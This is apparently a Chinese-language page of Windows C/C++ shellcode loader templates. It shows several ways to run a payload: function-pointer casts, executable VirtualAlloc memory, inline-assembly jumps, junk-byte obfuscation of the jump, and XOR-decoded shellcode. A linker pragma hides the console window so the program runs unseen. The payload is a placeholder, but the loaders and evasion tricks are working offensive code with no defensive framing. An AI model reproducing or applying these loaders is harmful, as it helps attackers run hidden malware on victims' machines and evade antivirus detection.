C/C++

1
2
#pragma comment(linker, "/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
//使得windows控制台程序不出黑窗口

指针执行

1
2
3
4
5
6
7
8
unsigned char buf[]="shellcode"; 
#pragma comment(linker, "/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
void main()
{

    ((void(*)(void))&buf)();

}

申请动态内存加载

1
2
3
4
5
6
7
8
9
10
11
12
#include<windows.h>
#include<stdio.h>
#include<string.h>
#pragma comment(linker, "/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
unsigned char buf[]="shellcode";
void main ()
{
    char *Memory;
    Memory=VirtualAlloc(NULL,sizeof(buf),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    memcpy(Memory,buf,sizeof(buf));
    ((void(*)())Memory)();
}

嵌入汇编加载

1
2
3
4
5
6
7
8
9
10
11
12
#include<windows.h>
#include<stdio.h>
#pragma comment(linker,"/section:.data,RWE") //data段可读写
unsigned char buf[]="shellcode";
void main()
{
    __asm
    {
        mov eax,offset buf
        jmp eax
    }
}

强制类型转换

1
2
3
4
5
6
7
8
#include<windows.h>
#include<stdio.h>
#pragma comment(linker, "/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
unsigned char buf[]="shellcode";
void main()
{
    ((void(WINAPI*)(void))&buf)()
}

汇编花指令

1
2
3
4
5
6
7
8
9
10
11
12
#include<windows.h>
#include<stdio.h>
#pragma comment(linker,"/section:.data,RWE") //data段可读写
unsigned char buf[]="shellcode";
void main(){
    __asm
    {
        mov eax,offset buf
        _emit 0xFF
        _emit 0xE0 //相当于jmp eax
    }
}

XOR加密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#include <windows.h>
#include <iostream>
int main(int argc, char** argv) {
    char encryptedShellcode[] = "encryptedShellcode";
    char key[] = "L1ang";
    char cipherType[] = "xor";
    char shellcode[sizeof encryptedShellcode];
    int j = 0;
    for (int i = 0; i < sizeof encryptedShellcode; i++) {
        if (j == sizeof key - 1) j = 0;
        shellcode[i] = encryptedShellcode[i] ^ key[j];
        j++;
    }
    void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, shellcode, sizeof shellcode);
    ((void(*)())exec)();
}